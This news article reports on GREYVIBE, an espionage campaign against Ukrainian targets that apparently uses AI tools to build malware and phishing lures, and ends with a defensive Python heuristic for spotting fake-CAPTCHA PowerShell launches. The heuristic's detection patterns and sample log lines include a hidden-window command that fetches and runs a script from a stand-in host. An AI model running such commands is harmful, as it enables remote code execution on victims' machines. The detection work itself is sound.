GREYVIBE Cyberattacks Use AI to Target Ukraine
A newly uncovered cyber espionage operation dubbed GREYVIBE is using artificial intelligence across multiple attack stages to target Ukrainian military, government, and civilian organizations.
Researchers tracking the campaign said the GREYVIBE cyberattacks have been active since at least August 2025. The threat activity combines spear-phishing, fake CAPTCHA pages, and fraudulent adult-themed websites to distribute malware and collect intelligence linked to the Russia-Ukraine conflict.
Investigators believe the operators are Russian-speaking and likely work within the Moscow time zone. However, the group also shows strong ties to cybercrime-style operations, making attribution more complex.
AI Integrated Into the Attack Chain
One of the most notable aspects of the campaign is its extensive use of generative AI tools.
The operators appear to rely on AI platforms such as ChatGPT, Google Gemini, and Ideogram AI to accelerate malware development, phishing infrastructure creation, and post-compromise operations.
Researchers observed signs of AI-assisted coding in custom malware families, obfuscation tools, and phishing pages. Additionally, the attackers used AI-generated imagery inside lure websites and social engineering campaigns.
Security analysts believe the use of AI helps the group rapidly modify infrastructure and evade traditional attribution methods.
Multiple Campaigns Linked to GREYVIBE
The operation consists of several connected campaigns using shared malware and infrastructure.
PhantomMail Phishing Attacks
The group launched spear-phishing campaigns impersonating Ukrainian government agencies and energy organizations. Victims received malicious archive files through file-sharing services.
Once opened, the payload displayed decoy documents while silently deploying malware in the background.
PhantomClick Fake CAPTCHA Sites
In another campaign, attackers created fake Cloudflare verification pages. Victims were instructed to execute commands manually under the guise of completing a CAPTCHA challenge.
Running those commands actually triggered a PowerShell-based infection chain.
PrincessClub Social Engineering
The most unusual operation involved fake Ukrainian adult-club websites designed to lure military personnel.
Attackers reportedly used fake female personas on Telegram to build trust with targets before directing them to malicious sites. Some later versions even included WebRTC-based video and audio call functionality, potentially enabling live intelligence collection.
Custom Malware and Android Spyware
The GREYVIBE cyberattacks rely heavily on custom malware families, including:
- PhantomRelay – A modular PowerShell remote access trojan
- LegionRelay – A lightweight RAT used for file theft and remote commands
- FallSpy – Android spyware capable of collecting contacts, call logs, location data, and media files
Researchers also identified several custom obfuscation frameworks named LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP.
Moreover, analysts discovered operational security mistakes inside LegionRelay that exposed portions of the attackers’ backend infrastructure. This visibility allowed investigators to monitor post-compromise activity over an extended period.
Russian Nexus and Cybercrime Overlap
Although the campaigns align closely with Russian intelligence objectives, investigators said the operators do not demonstrate the sophistication typically associated with elite state-backed groups.
Instead, the activity shows overlaps with cybercriminal ecosystems, including malware-sharing patterns, cryptocurrency mining payloads, and public malware testing behavior.
Researchers assess that GREYVIBE may represent a hybrid threat group operating between traditional cybercrime and state-aligned espionage.
Security Concerns Continue to Grow
The GREYVIBE cyberattacks highlight how AI is rapidly reshaping offensive cyber operations. By combining generative AI with phishing, malware development, and deception tactics, threat actors can accelerate campaigns while reducing technical barriers.
Security teams are advised to monitor for suspicious PowerShell activity, fake CAPTCHA lures, and unusual outbound connections tied to remote access malware. Additionally, organizations supporting Ukraine or related sectors should strengthen phishing defenses and endpoint monitoring capabilities.
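The PhantomClick fake-CAPTCHA lure described above talks the user into running a command by hand, and the advice here is to watch for the resulting PowerShell activity. As an added illustration (not code from the report or the researchers behind it), the following Python heuristic scores constructed Sysmon-style process-creation records for that pattern: PowerShell launched from explorer.exe (the Run dialog / address-bar route) with a hidden window, an encoded script, or a fetch-and-execute command line. The field names, indicator weights, threshold and sample records are all assumptions.

```python
import json
import re

# Weighted command-line traits of a PowerShell loader launched from a "paste this
# command" lure. Weights and threshold are assumptions, not values from the report.
INDICATORS = [
    (r"-w(indowstyle)?\s+hidden", 2),                       # hide the console window
    (r"\s-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", 2),   # base64-encoded script
    (r"\biex\b|invoke-expression", 2),                      # run fetched text as code
    (r"\biwr\b|invoke-webrequest|downloadstring|\bcurl\b", 1),
    (r"-e(p|xecutionpolicy)\s+bypass", 1),
    (r"https?://", 1),
]
THRESHOLD = 3

# Constructed Sysmon-style process-creation records (JSON lines), not real telemetry.
SAMPLE_LOG = [
    r'{"parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -w hidden -ep bypass -c \"iex (iwr https://verify.example.invalid/check)\""}',
    r'{"parent": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -nop -w hidden -enc aGVsbG8gd29ybGQgdGhpcyBpcw=="}',
    r'{"parent": "C:\\Program Files\\Microsoft VS Code\\Code.exe", "image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "cmdline": "pwsh.exe -NoProfile -Command Get-ChildItem"}',
    r'{"parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe"}',
]

def score_event(event: dict) -> int:
    """Suspicion score for one record; 0 for anything that is not PowerShell."""
    image = event.get("image", "").rsplit("\\", 1)[-1].lower()
    if image not in ("powershell.exe", "pwsh.exe"):
        return 0
    cmdline = event.get("cmdline", "")
    score = sum(w for pat, w in INDICATORS if re.search(pat, cmdline, re.I))
    # explorer.exe as parent is the Win+R / address-bar route a fake CAPTCHA page
    # steers the user down; a shell or IDE spawning PowerShell is routine.
    parent = event.get("parent", "").rsplit("\\", 1)[-1].lower()
    if score and parent == "explorer.exe":
        score += 2
    return score

def scan(lines) -> list:
    """Parse JSON-lines records and return those at or above THRESHOLD, with scores."""
    hits = []
    for line in lines:
        event = json.loads(line)
        s = score_event(event)
        if s >= THRESHOLD:
            hits.append({**event, "score": s})
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["score"], hit["parent"], "->", hit["cmdline"])
```

The bonus for an explorer.exe parent is only applied when at least one command-line indicator is present, so a user simply opening a PowerShell window from the Start menu is not flagged.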